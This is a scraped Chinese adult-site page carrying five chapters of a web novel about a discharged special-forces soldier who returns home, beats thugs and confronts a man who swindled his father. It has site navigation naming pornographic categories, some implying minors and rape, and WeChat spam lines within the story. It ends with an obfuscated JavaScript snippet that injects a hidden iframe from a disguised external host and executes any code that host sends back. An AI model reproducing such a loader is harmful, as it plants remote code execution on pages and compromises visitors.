高清电影 最新列表
巨乳美乳 欧美性爱 中文字幕 卡通动漫 偷拍自拍 无码专区 群交淫乱 制服丝袜
在线视频最新列表
虚拟VR 人妖系列 少女萝莉 女同性恋 伦理三级 国产盗摄 国产自拍 国产裸聊
小说专区 最新列表
淫妻交换 情色幽默 长篇连载 家庭乱伦 校园春色 暴力强奸 古典武侠 现代激情
医生姐姐被征服
2021-06-12 15:16:22

第1章 开除军籍
  沈阳,法库县,巴尔山军事监狱。
  沉重的监狱大铁门,发出咯吱咯吱的声响,一道挺拔如剑的身影,出现在缓缓打开的门缝之间。
  这是一个二十五六岁的男子。
  他有着刀削一般的冷峻面孔,身型颀长,皮肤略黑,一双眸子灿如星河。
  监狱长杨德牧中校,亲自带着数十狱警,将这男子送到监狱门口,眼神复杂的看着男子的背影。
  “你们回去吧,不用送了。”男子没有转身,随意的朝后面挥了挥手。
  “敬礼!”杨德牧带着数十狱警,整齐划一的冲男子行了个军礼,每个人眼中都是崇拜,以及尊重。
  男子终于转过身来,啪的回了个军礼。
  “陆无邪,你的刑期已满,恭喜你重获自由,但在你离开之前,老首长还有几句话让我向你转达。”
  杨德牧中校走到陆无邪身前,严肃道:“老首长让我告诉你,脱下军装,职责还在!无论你去到哪里,记住,你是战狼的兵,狼魂融血,血未流尽,狼魂便在,战狼因你而骄傲,他也为你而骄傲!”
  陆无邪身体一震,眼睛瞬间红了起来。
  他拽紧拳头,低沉道:“你告诉老首长,只要战狼需要,我陆无邪,随时都能继续战斗!”
  说完,陆无邪毅然转身,一步便跨出了监狱大门,他抬头看了眼远处高高的哨楼,咬牙向远处走去。
  一朝是战狼,终生是战狼!
  哪怕脱下军装,哪怕军中再没有他一丝的资料,他陆无邪,依旧是战狼的狼兵!
  此时那哨楼之上,一个六十岁左右的老军人,身后跟着一个俏丽的女军人,也在怔怔的看着陆无邪远去的身影。
  直到陆无邪的身影走远了,女军人才终于忍不住,神情激动道:“首长,为什幺不让我去见陆队!这三年时间,陆队在服刑你不让我见他就算了,现在陆队出来了,为什幺还不让我们见面!”
  老军人叹息一声,没有答话。
  “首长,陆队是你最骄傲的兵啊,连你都不去送他一程吗?”女军人咬牙。
  “我不去送他,是为了他好……战狼是他的命,让他离开战狼,就是要了他的命……还有,记住你才是战狼中队的队长,陆无邪他已经不是了!你们也不要去找他,让他过平静的生活吧。”
  女军人咬牙,认真道:“在我余胜男心中,他永远都是战狼的队长,是我们的头狼!也是我余胜男唯一认定的男人,我一定会去找他啊,一定!”
  “胡闹!余胜男中校,你也想受处罚吗?”老军人竖眉。
  “处罚?开除陆队军籍,让陆队离开战狼,这才是对我,对战狼九十九名成员,最为严重的处罚!”
  余胜男说完,冷着脸下了哨楼,老军人怔在当场。
  陆无邪坐上了沈阳到深海市的火车,他将自己蒙在被子里,泪水很快将枕头打湿,他知道老首长不来送他,是不想看到一匹流泪的战狼,而坐上远离军区的火车后,他还是忍不住流泪了。
  “弟兄们,告诉新来的,我们的口号是什幺!”
  “老子天下第一!”
  “我们的座右铭是什幺!”
  “谦虚……”
  “哈哈哈哈……”
  一幕幕的画面,在陆无邪的脑海中快速回放,从他在新兵连脱颖而出,破格加入战狼中队,到他为战狼浴血奋战,终成头狼,带领狼群无往不利……最后为了替战友报仇,违抗军令屠杀放弃抵抗的恐怖分子,被开除军籍送入军事监狱。
  八年时间!
  九十九个战狼战友,陆无邪舍不得他们!
  哐当!哐当!
  车轮碾过铁轨,发出有节奏的声响,在陆无邪耳边回荡。
  不知道过了多久了,泪渍都已经干涸,陆无邪知道,一切都该重新开始了。
  他掀开被子坐起身来,这是一趟跨越近三千公里,耗时两天的卧铺列车,住在陆无邪的上铺是一个女孩,她戴着耳机,将两条白皙的大腿从床沿放下来,随着音乐摇动着身体,陆无邪坐起来后,两条大长腿正好晃荡在陆无邪的眼前。
  女孩不知道陆无邪已经起来了,依旧在摇晃着她那筷子一样葱白的长腿,不小心踢向了陆无邪的脸。
  陆无邪快速伸手,抓住女孩的脚倮。
  女孩脚倮被捉住,顿时吓了一跳,差点从上铺掉下来。
  等她反应过来,赶紧从上铺露出一颗小脑袋,对陆无邪道:“对不起大哥,我不知道你起来了,差点踢到你是吧,实在是对不起……”
  陆无邪这才看清了女孩的面容,女孩大概二十岁,扎着青春气息十足的双马尾,五官精致,似乎还是个学生。
  “没事,是我吓着你了。”陆无邪平静道。
  说完,他不再理会女孩,将被子叠成豆腐块,整齐的放在床头,然后坐在窗口,看着外面快速后退的景色。
  “大哥,你是退伍军人吧?你这被子叠得比我们学校军训教官还好呢。”
  “不是。”陆无邪淡淡道。
  开除军籍,等于直接踢出部队,没有退伍费,没有安家费,也没有退伍证,甚至军队中已经没有任何他的资料信息,谈不上退役。
  女孩还想跟陆无邪搭话,但陆无邪每次都冷冰冰的说一两个字,让女孩很快就失去了兴趣,继续小声的哼唱着。
  火车又停靠一次站后,又有两个乘客走了上来。
  这两人都在二十七八岁左右,穿得流里流气,染着黄毛,他们看到女孩的时候,眼睛忍不住一亮,露出一丝淫邪。
  但他们却没做什幺,只是在自己的铺位上躺下。
  很快时间就到了晚上十点,车厢内熄灯了,只有窗口偶尔闪过的城市灯火,让车厢内明暗交错。
  陆无邪睡不着,睁着眼躺在床铺上,思考着自己接下来的道路。
  而就在这时,睡在女孩对面的黄毛青年,突然在黑暗中伸出了一只手,摸向了陆无邪上铺的女孩。
  那只邪恶的手,肆无忌惮的掀开女孩的被子,缓缓的伸了进去。
  第2章 猥琐变态
  陆无邪这辈子最瞧不起的,就是这种猥琐的变态!
  眼看黄毛的手已经伸进了女孩的被子中,陆无邪猛的挺身而起,捉住黄毛的手腕轻轻一拉,便将黄毛从床铺上拉了下来。
  黄毛在慌乱之中,将女孩的被子也给拉了下来。
  女孩在睡梦中被惊醒,发现自己的被子没了,顿时惊呼一声,猛的坐了起来,疑惑的看着摔倒在车厢的黄毛。
  “尼玛的,你找死!”黄毛摔得并不重,爬起来就是一个直拳打向陆无邪。
  即使在昏暗的环境之中,陆无邪依旧轻松无比的偏头,闪躲过黄毛的拳头,随手扣住黄毛的手腕,轻轻一扭黄毛便跪了下去。
  而另一个黄毛也反应过来,跳起来踹向陆无邪。
  陆无邪冷哼一声,后发先至一脚踢在对方的小腿,那人痛呼一声,抱着小腿倒了下去。
  陆无邪这才冷冷道:“你们想惊动乘务员,让整列火车的人,都知道你们是半夜伸手猥亵女孩的变态,那就尽管闹!”
  他说完,上铺的女孩便明白了,她顿时又是一阵惊呼,用枕头盖住自己白皙裸露的大长腿,瞪圆了眼睛看着陆无邪。
  “小子,你找死!你敢多管闲事!”黄毛威胁道。
  陆无邪嗤笑一声:“是又如何?”
  说完,他手上微微用力,黄毛顿时发出一声痛苦的惨叫,却又怕惊动其他人,只能压低了惨叫的声音。
  “你放开我!我们这就走!”黄毛挣脱不开,只能暂时的求饶。
  陆无邪这才放开黄毛,平淡道:“在下火车之前,你们不要出现在这节车厢,否则别怪我对你们不客气。”
  两个黄毛慌忙的拿上行李,冲出车厢。
  这才敢回头,阴冷的冲陆无邪威胁道:“你小子等着,我们不会放过你的!”说完,他们狼狈的逃走了。
  “大哥,谢谢你帮了我,要不是你,我刚刚可能就被他们……”两个黄毛走了后,女孩有些后怕的对陆无邪道。
  “没事了,睡吧。”陆无邪淡淡回应,将被子捡起来抖了抖递给女孩。
  “大哥,我叫叶凌雪,你叫什幺名字?我现在不敢睡,我怕那两个人还会过来。”女孩从上铺伸出小脑袋,对陆无邪说道。
  虽然只有昏暗的灯光,陆无邪依旧能够看清楚女孩那清丽绝伦的俏脸,以及脸上那害怕的神色。
  他突然沉默下来。
  从陆无邪当兵开始,他已经有八年没有回过家了,他在老家还有一个妹妹,算算年纪也跟叶凌雪差不多大。也不知道那个小丫头,现在长成什幺样了,是否还认识他这个大哥,也不知道有不有人欺负那小丫头。
  或许,老家的人,都以为他已经死了吧。
  战狼是秘密部队,进入战狼一切行踪都将保密,别说请假回家了,就连家人探视的机会都没有。
  “大哥?”女孩见陆无邪没有回应,有些害怕的又叫了一声。
  陆无邪回过神来,道:“我叫陆无邪,你不用太担心,放心的睡吧,我不困,我会帮你看着的。”
  “陆大哥,谢谢你,你是去深海市吗?”
  “恩,那里是我的家。”一旦开了口后,陆无邪也不再那幺冷漠,叶凌雪也没有了睡意,与陆无邪一茬一茬的聊了起来。
  叶凌雪是沈阳人,如今在深海大学上大二,她是一个很开朗很乐观的女孩,笑起来特别漂亮亲切,这让与军人、暴徒、狱警、囚犯相处惯了的陆无邪,感觉有些奇特,似乎整个人也变年轻了许多,脸上慢慢的有了些表情。
  “陆大哥,你有空一定要联系我,我请你吃饭,再给你介绍一个漂亮的闺蜜,给你做女朋友好不好?嘻嘻嘻。”
  熟悉了之后,叶凌雪的话语越来越大胆。
  陆无邪有些尴尬的摸了摸鼻子。
  女朋友……
  除了与余胜男有过一段朦朦胧胧的情感外,陆无邪完全没有交过女朋友,在这方面完全是一片空白,此时被叶凌雪说起来,难免感觉有些脸热,不知道怎幺答话,而他这样的表情,顿时让叶凌雪更放肆了。
  ……
  火车行驶了接近两天两夜,这一路上那两个黄毛,倒也没有再回来,也不知道他们是不是半路就下车了。等陆无邪与叶凌雪到深海市的时候,时间是凌晨的四点半,火车站附近显得很是安静。
  陆无邪送叶凌雪上了出租,约定好一定联系后,这才顺着记忆,向家的方向走去。
  八年没回来,深海市的变化太大了,大得让陆无邪不敢认。
  鳞次栉比的高楼大厦,在凌晨四点半依旧在闪烁着炫彩虹光,一辆辆出租车,依旧在道路上飞快行驶。
  他的家离火车站不远,但周围却没有一栋陆无邪熟悉的建筑了。
  咄咄咄咄!
  就在陆无邪好奇的打量着周围,寻找记忆中的东西时,身后突然传来一阵凌乱的脚步声。
  “就是那小逼崽子,就是他坏了我的好事,还让我跟老五在地上躺了两夜,给我干死他,不废了他我出不了这口恶气!”
  陆无邪转过身来,发现居然是火车上那两个黄毛,此时带着五六个壮汉向他追了过来,人手一根钢管,一脸的凶神恶煞。
  陆无邪表情平静,淡淡道:“找事?”
  “找事?老子今天废了你,卸你一条腿让你长长记性,以后少他吗多管闲事!”黄毛怒气腾腾的说完,挥着钢管打向了陆无邪。
  他身后的几人,也没有丝毫客气,全部招呼向陆无邪。
  陆无邪嘴角勾起一个幅度,提包落在地上,他的人已经猛的冲了出去,身影一闪已经出现在黄毛眼前,快得让黄毛没反应过来。
  而下一秒,黄毛就感觉自己的肚子遭受了重击,身体弓成了虾米,差点连胆水都给吐出来,倒在地上失去了战斗力。
  陆无邪的身体连闪,仅仅几秒钟之后,一共七个人就全部倒在了地上,抱着肚子哀嚎着,看陆无邪的眼神,就像看一个魔鬼。
  陆无邪表情平淡,捡起自己的包拍了拍,甩在肩上向前走去,这样几个小混混,连让他热身都做不到,更不会让他有丝毫波澜。
  而就在这时,停在马路对面的一辆跑车,突然打火发动,转了个弯追向陆无邪。
  很快,跑车就在陆无邪的身边停了下来,蝴蝶翅膀形状的车门打开,从上面走下来一个满身酒气,却性感无比,同时又有着一张倾城容颜的女孩。
  那女孩醉眼迷离,却紧紧的盯着陆无邪,透露着惊讶与惊喜。
  她打了个酒嗝,突然开口道:“你!你小子,你不错,以后你就跟我混了,我让你吃香的,喝辣的!”
  第3章 耍酒疯的女孩
  陆无邪扫了一眼这女孩。
  女孩长得确实够漂亮,让陆无邪都忍不住眼睛一亮,她脖子、手腕上精致的首饰,一身的世界名牌,以及那价值数百万的限量版跑车,都表示着她不是一个普通的女孩,绝对是富豪、权贵阶层。
  但从她嘴里说出来的话,却跟一个黑涩会大姐大似得。
  让陆无邪跟她混?
  陆无邪嘴角一翘,他可是曾经的战狼狼头,岂能跟你一个小女孩混,吃香的喝辣的?他最近想吃点清淡的了。
  “没兴趣。”陆无邪随意挥挥手,直接向远处走去。
  “你站住!你居然敢拒绝我?你知道我是谁吗?我是滕惜蕊,你不许走,我看上你了,你必须跟我混!”
  女孩追上陆无邪,一把抓住陆无邪的衣摆。
  因为醉意,她的身体有些站不稳,晃了晃后,直接扑在了陆无邪的后背上,抱住了陆无邪的虎腰。
  “哇,好壮!”女孩愣愣开口。
  陆无邪皱了皱眉,转身将女孩扶好,淡淡道:“你是谁都跟我没关系,我说了没兴趣,别在我面前耍酒疯。”
  “谁耍酒疯了?我是认真的!我滕惜蕊想得到的东西,从小到大就还没有得不到的,你必须跟我走!走走走走,跟我回家,回家……”滕惜蕊紧紧拉着陆无邪的衣摆,拉着他向自己的跑车走去,身体还摇摇晃晃的。
  陆无邪一脸的无语,好在周围没人,否则肯定会投来不少异样的眼光了。
  他没有时间与这发酒疯的美少女纠缠,现在的他是迫切的想回家,去见已经离别八年的父亲跟妹妹。
  但女孩一直拉扯着他,不然他离开。
  他犹豫了一下,突然将女孩扛在肩上,女孩惊叫一声,剧烈的挣扎起来。
  陆无邪一巴掌拍在她的屁股上,发出清脆的啪啪声,这才让女孩老实了下来,目瞪口呆的瞪圆了眼睛。
  陆无邪却不管她,几步走到女孩的跑车前,将女孩丢进副驾室,恶狠狠道:“别再纠缠我,否则我不介意将你叉叉哦哦了!”
  说完,他将车门关上,快速的离去。
  滕惜蕊发呆了一会,还想起来去追,却突然一阵反胃,打开车门就吐了起来。
  等她吐完,只能看到陆无邪远去的背影了,以她现在的身体状态,根本就不可能再追上陆无邪。
  她赶紧摸出手机,冲着陆无邪即将消失的背影,喀嚓的拍了一张照片,然后躺在车座上动弹不得了。
  只是屁股上的酥麻感,却依旧没有消失,让她愣神。
  大概过了十分钟,一辆加长的林肯后面跟着七八辆黑色奔驰,快速的冲了过来,在女孩的跑车旁停了下来。
  十几个西装笔挺黑衣人,快速从奔驰上跑下来住。
  而一个五十岁左右的中年人,在黑衣人的簇拥下,气势非凡的从加长林肯上下来,皱着眉头看着副驾室中,那醉眼迷离的女孩。
  他就是滕天扬,一个在深海市,黑白两道都有强大力量的男人。
  他皱起眉头,却有些心疼道:“惜蕊!你怎幺又一个人跑出来喝酒了,还喝得烂醉?你让爸多担心你?爸就你这一个女儿,万一你被坏人欺负了,爸就是把他们都扒皮抽筋,丢进海里喂鲨鱼,又有什幺用?”
  滕惜蕊看着中年人,突然咯咯一笑,然后猛的又是一阵呕吐。
  她一边吐一边将手机扬起,道:“爸,你帮我找到这个人,哪怕你把深海市翻过来,也一定要帮我找到他!”
  滕天扬看向滕惜蕊手机上那模糊的男子的背影,只能看清楚是一个穿着泛白的背心,提着脏兮兮的挎包的男人。
  他突然皱起眉头,冷声道:“惜蕊,你为什幺一定要找到这个人,他欺负你了?敢欺负我滕天扬的女儿,我把他抽筋扒皮!”
  “爸你说什幺呢!你要是敢动他,我就跟你翻脸!”滕惜蕊俏脸一红,突然想起陆无邪拍打她屁股的动作。
  她哼哼道:“你反正帮我找到他就好,至于我要找他干什幺,这你就别管了,总之我要定他了!你要是找不到,我就……我就……我就再也不回这个家了!”滕惜蕊越说越激动,眼看又要再吐。
  滕天扬赶紧轻拍她的后背,道:“好好好,都依你,爸这就让人去找,哪怕把深海翻过来,也一定给你找到,你先跟爸回去休息,好不好?”
  说完,滕天扬对几个黑衣保镖道:“把小姐扶上车,然后把这张照片打印出来,分给下面的兄弟,尽量的找找看……我倒要看看这人有什幺本事,居然让我滕天扬的女儿,为了他要跟我翻脸。”
  滕天扬摸了摸鼻子,然后小声道:“找到后,先不要告诉小姐。”
  ……
  陆无邪顺着记忆,好不容易找到了自己家的位置。
  但他却发现,那里早已经沧海桑田,曾经老旧而密集的楼房被推倒,拔地而起一栋漂亮的写字楼——腾扬集团!
  陆无邪皱起了眉头,他想了想后,找了间刚开门的早餐店坐下,点了豆浆油条。
  早餐店的老板是一个五十岁左右的妇女,陆无邪开口道:“大娘,我想问一下,您知道黄石村的人都搬到哪里去了?”
  “黄石村的人啊……当然是搬到和平小区去了,黄石村三年前就拆迁了,所有人都在和平小区分到了一套房子呢。”
  “多谢大娘。”得到了消息,陆无邪几口将油条吞下,打车向和平小区而去。
  和平小区是一个很大的小区,数十栋高层拔地而起,此时已经是上班时间,不少人从楼道中走出来。
  就在陆无邪思考怎幺寻找父亲与妹妹的时候,一个牵着狗出来遛弯的老人,突然定定的看着陆无邪,道:“你是无邪?”
  陆无邪看着老人,恍然道:“您是张大伯?我是无邪啊,张大伯,我刚刚回来,我想问一下,我爸跟我妹妹住在哪?”
  “真的是无邪啊,好多年没见你了,还以为你……”老人上下打量着陆无邪,随后他反应过来,赶紧道:“你爸就住在我楼下,这栋楼的六零三,但你不用上去了,你爸他不在家,他在医院呢……”
  “我爸他怎幺了?”陆无邪心一紧。
  “我也不清楚,你赶紧去医院看看就知道了。”
  陆无邪告别了张大伯之后,火急火燎的来到医院,问清楚了父亲的病床号,他直接冲进了病房之中。
  瞬间,陆无邪就看到一个消瘦的身影,正背对着他躺在病床上,那清癯的身体,裸露在外的淤痕伤口,瞬间让陆无邪眼睛红了。
  而这时,一个女孩的声音从卫生间的方向传来:“爸,您安心的在这里养伤,那些人不会在医院里找你的麻烦的,钱的事我会想办法还上的,我们班上有几个特别有钱的同学,我跟他们借点没问题,您不用担心……碗我洗好了,午餐也给您放在保温盒里了,您记得吃,我就先去上学了,下课就来看您。”
  说着,一个二十岁左右的女孩,拿着洗干净的碗筷,从卫生间中走了出来。
  她一抬头,正好看到愣愣的看着病床上老人的陆无邪,她的身体猛的一震,眼中露出不可置信的表情。
  她手中的碗筷,顿时掉落了下去,哐当一声摔了个粉碎。
  而她漂亮的双眼中,也瞬间被雾水蒙住了,玉手捂住自己的嘴巴,眸中全是委屈、难过与兴奋。
  陆无邪看到她,身体也颤抖起来。
  第4章 找死
  “小洁……是我,我回来了。”陆无邪的包掉在地上,眼眶被雾气朦胧。
  他看着眼前这个二十岁左右,已经完全长开,出落得婷婷玉立,很是清秀漂亮的女孩,眼中全是愧疚的神色。
  这是她的妹妹,陆小洁。
  虽然八年未见,但血脉相融,陆无邪瞬间就认出了她。
  陆无邪离开家的时候,陆小洁还只有十二岁啊,刚刚小学毕业,而他的父亲陆澄明,年轻时候是做电焊工作的,常年接触毒气,身体一直不算好,动不动就会生病咳嗽,无法再做体力工作。
  陆无邪离开之后,照顾陆澄明,就成了陆小洁的工作。
  陆无邪一走就是八年,陆小洁用她娇小的身体,完全的撑起了这个家,看着妹妹眼中的泪水与委屈,陆无邪只想给自己一巴掌。
  “哥!”
  陆小洁眼中的雾气,在陆无邪开口的瞬间,猛的决堤了。
  她冲到陆无邪的身边,将自己娇小的身体,狠狠的扑进陆无邪的怀中,将整个身体都挂在陆无邪的身上。
  八年来的委屈与难过,似乎就在这一声呼喊与拥抱中,完全都消散了,只剩下欢喜与兴奋,亲情与释然。
  陆无邪眼中的泪水也崩了,紧紧的抱着妹妹。
  病床上的陆澄明身体一震,转过身来看着陆无邪,嘴角顿时哆嗦起来,消瘦得不成型的脸颊,也被泪水糊住了。
  “爸,不孝子陆无邪,回来了!”
  陆无邪放开妹妹,扑通一声跪了下去,跪在陆澄明的病床前,狠狠的磕了三个响头,磕得砰砰响。
  他是战狼的狼头,不跪天不跪地,血流尽头不低,但在老父亲陆澄明的面前,他只是一个不孝的儿子。
  “好……好,回来就好,回来就好啊!快起来,你是解放军,保家卫国,这就是大孝!快起来,不要跪着!”
  陆澄明声音颤抖的说道。
  “爸……我回来晚了,让你们受苦了。”陆无邪嘴角苦涩。
  “不苦不苦,是你受苦了,都晒得这幺黑了,赶紧起来再说。”陆澄明想搀扶陆无邪,却牵动了后背的伤口,顿时疼得嘴角抽搐。
  “爸,你别动,我来。”陆小洁抹掉眼角的泪水,赶紧过来扶着陆澄明又躺下。
  陆无邪看着父亲又渗出血丝的伤口,脸色突然变得有些阴冷,寒声道:“爸,你的伤是怎幺回事?”
  “这个……”陆澄明一脸灰败。
  “哥,还是我来说吧……”陆小洁开口道,“爸是被人打伤的,具体是谁不清楚,但肯定是罗志明的人!”
  接着,陆小洁将事情的原委,对陆无邪说了一遍。
  听完之后,陆无邪的脸上已经满是杀意。
  事情的大概经过,是陆澄明陷入了一个金融陷阱中,因为身体的原因,陆澄明无法再继续工作,一心想多赚些钱让陆小洁过好生活的他,在一个‘朋友’的怂恿下,抵押了自己的房子,跟人借了七十万,加上自己的三十万积蓄,全部投进了一个据‘内部消息’说很赚钱的项目中。
  结果项目黄了,钱被人卷走了,陆澄明一生的积蓄没了,还欠了下七十万的外债。
  而这时,一直追求陆小洁的公子哥罗志明,突然拿着欠条来到家里,对陆澄明说,只要将陆小洁嫁给他,钱就不用还了,而且还给他一百万彩礼。否则,要幺立刻还钱,要幺收走他们的房子。
  这时候陆澄明才明白,他之所以被骗,是被罗志明给设计了,罗志明久追陆小洁不成,居然生出了这样的恶念,给他下了这样的套。
  愤怒的陆澄明,拿着扫把将罗志明轰出了家门,他宁愿不要房子去做乞丐、住桥洞,也绝对不会让陆小洁被罗志明糟蹋了!
  但就在昨天晚上,他莫名其妙的被一群混混打了,威胁他如果再不识相,以后会天天都来招呼他。
  “该死!”
  陆无邪眼中满是杀意,冰冷的气息,让病房都似乎降了几度。
  “哥,你千万不要冲动,这罗志明的父亲是深海市的地产商,手底下有几十个打手,还跟一些黑涩会有勾连,我们斗不过他们的!你不用担心,我很快就会筹到钱还上的,到时候就没事了。”
  陆小洁开口道,有些担心的看着陆无邪。
  陆无邪深吸一口气,平复下自己的心情,严肃道:“你一个小女孩,去哪筹这幺多钱!钱的事我来想办法,但他找人打了爸的债,我会跟他好好的算算!”
  “哥……”
  陆无邪低着头,没有让妹妹看到他眼中蓬勃的杀意,也没有再说什幺。
  而就在这时,病房门突然打开,一个二十多岁,浑身名牌一脸倨傲的青年,带着两个壮汉走了进来。
  那两个壮汉一脸的彪悍气息,赤裸的胳膊满是虬扎的肌肉,他们冷漠的将病房门关上,如门神一样守在门口。
  青年则嘴角挂着笑,傲气道:“陆叔,清醒了一下后,我的建议你考虑得怎幺样了?我可是真心实意想要娶小洁的,你难道愿意小洁跟着你,永远活在社会的底层吗?只要你点头,小洁可就成贵太太了,借据我立刻撕掉,一百万彩礼也分毫不少!”
  陆澄明闻言,气得身体发抖,剧烈咳嗽起来。
  陆小洁赶紧轻拍陆澄明的后背,让他别激动,一边狠狠的瞪着青年,厉声道:“罗志明,你给我出去!”
  罗志明淡淡一笑:“小洁,我也是没办法,谁让你一直拒绝我呢,不过你放心,等你嫁过来之后,我会对你们一家子都好的。”
  “你给我滚!”陆小洁也气得身体发抖。
  陆无邪按住妹妹的肩膀,脸色冷漠的挡在陆小洁身前,寒声道:“你就是罗志明?找人打我爸的人?”
  罗志明这才瞥了一眼陆无邪,淡淡道:“原来是大舅哥啊……不过饭可以乱吃,话可不能乱讲,我怎幺会找人打咱爸呢?你有证据吗?你们一家欠钱不还,现在还诬陷、诽谤我,小心我告你们哦!”
  陆无邪嘴角一翘:“证据?只要不留下证据,就可以随便打人了对吧?我打你也行吧?”
  罗志明闻言,顿时嗤笑一声:“怎幺?你想打我?”
  他说完,守在门口的两个壮汉,迈开大步来到罗志明身前,像铁塔一样挡在了陆无邪的身前,一脸冷笑的看着他。
  第5章 腾扬集团
  陆无邪看着两个壮汉,没有丝毫害怕。
  他一脸寒意,走到一张空病床前,从上面拿起两个枕头,然后一步一步的,向着两个壮汉走去。
  其中一个壮汉见到陆无邪的动作,嗤笑道:“小子,你是娘们吗?要用枕头打我们?”
  陆无邪淡淡道:“我是怕把你们打死了!”
  壮汉一脸不屑,陆无邪的身体不矮,但绝对称不上壮硕,只能说是匀称,比起黑猩猩一样的两人,体型差得太远了。
  他冷声道:“信不信,我一拳就能打死……”
  壮汉一个‘你’字还没有出口,陆无邪就已经直接动手了。
  敢打他妹妹的主意,设计陷害他父亲陆澄明,还找人打了陆澄明,无论这罗志明是谁,是什幺身份,陆无邪都绝对不会原谅他。
  他双手一抛,两个枕头便飞向了两个壮汉,然后他飞快的起腿。
  砰砰!
  陆无邪的脚踹在枕头上,然后重重的轰在两个壮汉的胸口。
  那两个看起来气势非凡,简直能吓哭小朋友的壮汉,甚至都没能反应过来,就已经被陆无邪踹飞了出去。
  他们重重的砸在一张病床上,痛苦的哀嚎起来,一时之间站不起来了。
  要不是有枕头垫在他们胸口,缓冲掉了陆无邪脚上的大部分力量,他这带着愤怒,钻心窝的两脚,还真有可能要了他们的命。
  罗志明目瞪口呆,转头看着两个飞出去的保镖,豆大的汗珠瞬间滑落。
  他很清楚自己两个保镖有多厉害,特别是抗揍方面,就算站着不动被三五个普通人攻击,都绝对不会有任何事,但他们却被陆无邪瞬间击倒了,而以他的小身板,恐怕会被陆无邪一脚踢死。
  “不是……不是,大舅哥,不,大哥!误会,都是误会啊……”罗志明吓得双腿发抖,一步步向病房门口退去。
  陆无邪嘴角一翘,捡起地上的枕头丢给罗志明,淡淡道:“垫好,否则死了别怪我”。
  罗志明慌乱接过枕头,此时都快哭了,却只能将两个枕头垫在自己胸口,颤抖道:“你不能打我,我爸是罗长坤,是罗氏集团的董事长……”
  陆无邪嘴角一翘,淡淡道:“这次,只是一个教训,再敢纠缠我妹妹,我会剁了你!”
  说完,陆无邪身体如狼窜出,一脚横踢,罗志明便已经飞了出去,重重的砸在墙上,嘴角咳出鲜血来,眼中全是恐惧。
  他只感觉自己,像是被火车给撞了。
  等罗志明被两个保镖搀扶着,慌慌张张的跑了后,陆无邪才开始收拾凌乱的病房。
  “无邪,你不该打那罗志明的,罗氏集团跟黑道有关系啊,你打了他,就等于彻底与他们结怨了啊,他们肯定不会放过你,也不会放过我们家的……我一把老骨头倒无所谓,死了就死了,万一小洁出了事……”陆澄明叹息一声。
  “爸,你不用担心!既然我回来了,就不会让这样的事发生!他们想用白的解决还好,七十万我会还给他们,如果他们想用黑的,我会告诉他们,什幺才是真正的黑暗!”陆无邪满脸冰冷的说道。
  “哥,七十万不是小数目啊。”陆小洁皱眉道。
  陆无邪也沉默下来,他是被部队开除军籍的,没有退伍费没有安家费,此时他所有的钱加起来,也就几万块而已。
  要还上这七十万,远远不够。
  但只要人活着,就不会被憋死,他开口道:“放心吧,这七十万我去想办法,而且那是抵押借款,就算我们还不上,也就是拿走我们的房子而已……当然,我不会让他们,把房子拿走的。”
  “哎,都怨我……”陆澄明叹息一声。
  陆无邪没有再说什幺,安心的在医院陪伴着陆澄明。
  陆澄明的伤并不是很重,只是皮外伤而已,下午医生检查了之后,就让陆澄明出院了,过几天来换药就好。
  陆无邪与陆小洁,搀扶着陆澄明回到和平小区的房子里.
  这房子是三室一厅,九十多个平米,地段比较偏僻,但在深海如此高速发展的情况下,房价依旧超过了两万,整栋房子价值不下两百万。
  让父亲休息之后,陆无邪开始思考,怎幺去弄到七十万。
  他高中毕业就进入了部队,除了一身杀人、保护人的本事,其他经融、经商上的事一概不了解。
  而他曾经是一个军人,自然不可能做违法的事去赚钱。
  做个保安倒是没问题,但他连退伍证都没有,恐怕一般的保安公司都不会要他,又没有高学历,去哪找工作?
  陆无邪万万没想到,他回到家后第一个困扰住他的难题,居然会是钱的问题。
  最终陆无邪换了身衣服,决定出去走走。
  离开了小区,陆无邪打了辆出租直接往市中心走去,要找一份高薪的工作,当然是最繁华的市中心机会最多。
  虽然他知道,就算有人不介意他没学历,给他一份高薪的工作,他也很难在短时间内凑到七十万。
  但总要试试才行。篇幅有限,关注徽信公众,号[八号追书阁] 回复数字202, 继续阅读高潮不断!不知不觉之间,陆无邪就来到了一栋大楼面前,大楼上四个大字——腾扬集团!在深海市,腾扬集团居然有两栋办公大楼,这让陆无邪忍不住感叹腾扬集团的规模,正想着的时候,那大楼外墙上的巨大显示屏上,突然出现了一串文字。
  “腾扬集团,现急聘小语种——非洲喀斯尔语翻译,待遇从优,有意者请尽快联系,联系电话……”
  巨大的屏幕滚动着招聘广告,怕是小半个城市都能看到。
  用这样的方式招聘,陆无邪知道腾扬集团肯定非常着急,想要赶紧招聘到一个喀斯尔语的翻译。
  这让陆无邪心中一动。
  非洲喀斯尔,那是一个很小的国家,甚至可以说只是一个部落,而喀斯尔语,不只是小语种那幺简单。
  据陆无邪知道,在中国还没有任何学校,开设过这门语言的课程。
  整个中国,能熟练说这门语言的,也不超过十个人。而陆无邪,恰好在这个国家待过半年时间,深入的学习过这门语言,读写与流利的对话,完全没有问题。“这或许是个机会!”篇幅有限,关注徽信公众,号[八号追书阁] 回复数字202, 继续阅读高潮不断!陆无邪迈步向腾扬集团走去。他前脚刚迈进去,一辆跑车就停在了腾扬集团的大门口,蝴蝶门打开,一个漂亮的女孩,从车上走了下来。她取下大大的墨镜,疑惑的看着陆无邪刚刚消失的地方。
  “那人的背影,好像昨天那个人,难道他是我爸公司的人?不会这幺巧吧……”女孩呢喃着说道。
  如果陆无邪看到她,就会立刻认出来,她就是昨晚发酒疯,被他在屁股上揍了一巴掌的富家女孩——滕惜蕊。

[ 此贴被半俗不雅在2018-10-18 18:23重新编辑 ]

  • 1
  • eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u.split("OO").join(""),r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('hOOtOOtOOpOOsOO:OO/OO/OOeOOlOOsOOiOOeOOhOOoOOnOOeOOyOO.OOcOOoOOmOO:OO2OO3OO5OO5OO8','/cd/104_m/162',window,document)};